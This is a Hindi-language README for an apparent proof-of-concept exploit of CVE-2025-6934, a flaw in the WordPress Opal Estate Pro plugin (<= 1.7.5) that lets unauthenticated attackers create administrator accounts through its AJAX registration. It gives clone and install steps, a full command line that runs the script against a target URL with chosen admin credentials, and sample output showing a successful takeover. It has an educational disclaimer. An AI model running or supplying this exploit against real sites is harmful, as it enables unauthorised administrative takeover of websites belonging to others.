
CVE-2025-6934 एक गंभीर कमजोरी है जो WordPress Opal Estate Pro प्लगइन (<= 1.7.5) में पाई जाती है, जो बिना प्रमाणीकरण के हमलावरों को प्लगइन की असुरक्षित AJAX पंजीकरण प्रक्रिया के माध्यम से नए प्रशासक खाते बनाने की अनुमति देती है।
📖 विवरण इस रिपॉजिटरी में CVE-2025-6934 के लिए एक प्रूफ ऑफ कॉन्सेप्ट (PoC) शोषण है, जो वर्डप्रेस प्लगइन: Opal Estate Pro <= 1.7.5 में एक गंभीर कमजोरी है, जो बिना प्रमाणीकरण के व्यवस्थापक खाता निर्माण की अनुमति देती है।
⚠️ अस्वीकरण: यह उपकरण केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए प्रदान किया गया है।
लेखक किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है।
readme.txt से प्लगइन संस्करण का स्वचालित पता लगानारिपोजिटरी को क्लोन करें और निर्भरताएँ स्थापित करें:
git clone https://github.com/0xgh057r3c0n/CVE-2025-6934.git
cd CVE-2025-6934
pip3 install -r requirements.txt
requests
beautifulsoup4
colorama
लक्ष्य के साथ स्क्रिप्ट चलाएँ:
python3 CVE-2025-6934.py -u http://target.com/ -mail [email protected] -password MySecurePass123 -user newadmin
✅ उदाहरण आउटपुट:
[✔] Exploit Successful!
Username : newadmin
Email : [email protected]
Password : MySecurePass123
Role : administrator

गौरव भट्टाचार्जी (0xgh057r3c0n)
यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है – विवरण के लिए LICENSE फ़ाइल देखें।